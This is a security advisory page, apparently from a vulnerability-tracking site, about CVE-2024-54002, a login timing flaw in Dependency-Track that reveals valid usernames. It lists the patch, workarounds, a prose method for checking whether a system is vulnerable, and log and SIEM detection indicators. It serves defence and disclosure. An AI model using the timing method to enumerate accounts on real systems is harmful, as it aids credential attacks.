CVE-2024-54002
📋 TL;DR
This vulnerability allows attackers to enumerate valid usernames in Dependency-Track by measuring response time differences during login attempts. Only local database users are affected - LDAP and OpenID Connect users remain secure. Attackers can use this information to facilitate further attacks like credential stuffing.
💻 Affected Systems
- Dependency-Track
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers enumerate all valid usernames, then perform targeted password attacks leading to unauthorized access and potential supply chain compromise.
Likely Case
Attackers discover some valid usernames, increasing success rate of subsequent credential-based attacks.
If Mitigated
Username enumeration provides limited value without additional vulnerabilities or weak credentials.
🎯 Exploit Status
Simple timing attack requiring no authentication. Attackers need to measure response times accurately.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.12.2
Vendor Advisory: https://github.com/DependencyTrack/dependency-track/security/advisories/GHSA-9w3m-hm36-w32w
Restart Required: Yes
Instructions:
1. Backup your Dependency-Track instance. 2. Stop the current instance. 3. Update to version 4.12.2 or later. 4. Restart the service. 5. Verify the update was successful.
🔧 Temporary Workarounds
Rate Limiting
allImplement rate limiting on /api/v1/user/login endpoint to slow down enumeration attempts
Configure web server or application firewall to limit requests to /api/v1/user/login
Network Controls
allRestrict access to Dependency-Track login endpoint to trusted networks only
Configure firewall rules to limit access to Dependency-Track instance
🧯 If You Can't Patch
- Implement LDAP or OpenID Connect authentication instead of local database users
- Deploy WAF with rate limiting and anomaly detection for timing attacks
🔍 How to Verify
Check if Vulnerable:
Test login endpoint with known and unknown usernames, measure response time differences. If unknown usernames respond significantly faster, system is vulnerable.Check Version:
Check Dependency-Track web interface or API for version informationVerify Fix Applied:
After updating to 4.12.2+, test that response times for valid and invalid usernames are consistent.📡 Detection & Monitoring
Log Indicators:
- Multiple failed login attempts with different usernames from same source
- Unusual pattern of login attempts with consistent timing
Network Indicators:
- High volume of POST requests to /api/v1/user/login
- Requests with sequential or dictionary-based usernames
SIEM Query:
source_ip=* AND destination_port=* AND http_method=POST AND uri_path="/api/v1/user/login" AND count>10 within 1 minute